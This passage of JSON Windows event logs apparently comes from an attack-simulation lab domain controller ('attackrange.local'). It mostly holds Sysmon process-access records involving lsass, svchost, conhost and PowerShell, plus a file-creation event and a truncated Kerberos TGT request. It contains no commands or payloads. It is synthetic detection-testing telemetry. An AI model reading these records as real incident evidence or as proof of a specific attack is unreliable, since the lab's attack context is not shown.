ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5545,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5546,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.150\r\nSourceProcessGUID: {E2A3D6B1-11D4-5F25-0000-00100D0C0800}\r\nSourceProcessId: 796\r\nSourceThreadId: 2504\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.150","SourceProcessGUID":"{E2A3D6B1-11D4-5F25-0000-00100D0C0800}","SourceProcessId":"796","SourceThreadId":"2504","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","TargetProcessId":"872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.166\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.166","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","TargetProcessId":"872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.181\r\nProcessGuid: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nProcessId: 872\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_hoihzrtg.ot4.ps1\r\nCreationUtcTime: 2020-08-01 06:55:17.181","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.181","ProcessGuid":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_hoihzrtg.ot4.ps1","CreationUtcTime":"2020-08-01 06:55:17.181","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.213\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.213","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","TargetProcessId":"872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.213\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D5-5F25-0000-0010EB1A0800}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.213","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D5-5F25-0000-0010EB1A0800}","TargetProcessId":"872","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:17.275\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:17.275","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220587,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication 